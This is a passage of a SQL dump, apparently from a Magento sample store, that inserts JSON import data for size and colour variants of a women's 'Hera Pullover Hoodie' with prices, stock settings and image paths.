Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hera-pullover-hoodie-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"}}');
INSERT INTO `importexport_importdata` (`id`, `entity`, `behavior`, `data`) VALUES
(11, 'catalog_product', 'append', '{\"1000\":{\"sku\":\"WH02-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Hera Pullover Hoodie-XS-Orange\",\"description\":\"<p>Get ready to rule the studio and dominate the yoga mat in the Hera Pullover Hoodie, a cozy yet classy look for any level of yogi.<\\/p>\\n<p>&bull; Teal with purple stiching.<br \\/>&bull; Hoodie pullover.<br \\/>&bull; Snug fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hera-pullover-hoodie-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},\"1001\":{\"sku\":\"WH02-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Hera Pullover Hoodie-S-Blue\",\"description\":\"<p>Get ready to rule the studio and dominate the yoga mat in the Hera Pullover Hoodie, a cozy yet classy look for any level of yogi.<\\/p>\\n<p>&bull; Teal with purple stiching.<br \\/>&bull; Hoodie pullover.<br \\/>&bull; Snug fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hera-pullover-hoodie-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh02-blue_alt1.jpg,\\/w\\/h\\/wh02-blue_back.jpg\",\"image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh02-blue_alt1.jpg,\\/w\\/h\\/wh02-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"1002\":{\"sku\":\"WH02-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Hera Pullover Hoodie-S-Green\",\"description\":\"<p>Get ready to rule the studio and dominate the yoga mat in the Hera Pullover Hoodie, a cozy yet classy look for any level of yogi.<\\/p>\\n<p>&bull; Teal with purple stiching.<br \\/>&bull; Hoodie pullover.<br \\/>&bull; Snug fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hera-pullover-hoodie-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"1003\":{\"sku\":\"WH02-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Hera Pullover Hoodie-S-Orange\",\"description\":\"<p>Get ready to rule the studio and dominate the yoga mat in the Hera Pullover Hoodie, a cozy yet classy look for any level of yogi.<\\/p>\\n<p>&bull; Teal with purple stiching.<br \\/>&bull; Hoodie pullover.<br \\/>&bull; Snug fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hera-pullover-hoodie-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"1004\":{\"sku\":\"WH02-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Hera Pullover Hoodie-M-Blue\",\"description\":\"<p>Get ready to rule the studio and dominate the yoga mat in the Hera Pullover Hoodie, a cozy yet classy look for any level of yogi.<\\/p>\\n<p>&bull; Teal with purple stiching.<br \\/>&bull; Hoodie pullover.<br \\/>&bull; Snug fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hera-pullover-hoodie-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh02-blue_alt1.jpg,\\/w\\/h\\/wh02-blue_back.jpg\",\"image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh02-blue_alt1.jpg,\\/w\\/h\\/wh02-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"1005\":{\"sku\":\"WH02-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Hera Pullover Hoodie-M-Green\",\"description\":\"<p>Get ready to rule the studio and dominate the yoga mat in the Hera Pullover Hoodie, a cozy yet classy look for any level of yogi.<\\/p>\\n<p>&bull; Teal with purple stiching.<br \\/>&bull; Hoodie pullover.<br \\/>&bull; Snug fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hera-pullover-hoodie-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"1006\":{\"sku\":\"WH02-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Hera Pullover Hoodie-M-Orange\",\"description\":\"<p>Get ready to rule the studio and dominate the yoga mat in the Hera Pullover Hoodie, a cozy yet classy look for any level of yogi.<\\/p>\\n<p>&bull; Teal with purple stiching.<br \\/>&bull; Hoodie pullover.<br \\/>&bull; Snug fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hera-pullover-hoodie-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"1007\":{\"sku\":\"WH02-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Hera Pullover Hoodie-L-Blue\",\"description\":\"<p>Get ready to rule the studio and dominate the yoga mat in the Hera Pullover Hoodie, a cozy yet classy look for any level of yogi.<\\/p>\\n<p>&bull; Teal with purple stiching.<br \\/>&bull; Hoodie pullover.<br \\/>&bull; Snug fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hera-pullover-hoodie-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh02-blue_alt1.jpg,\\/w\\/h\\/wh02-blue_back.jpg\",\"image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh02-blue_alt1.jpg,\\/w\\/h\\/wh02-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"1008\":{\"sku\":\"WH02-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Hera Pullover Hoodie-L-Green\",\"description\":\"<p>Get ready to rule the studio and dominate the yoga mat in the Hera Pullover Hoodie, a cozy yet classy look for any level of yogi.<\\/p>\\n<p>&bull; Teal with purple stiching.<br \\/>&bull; Hoodie pullover.<br \\/>&bull; Snug fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 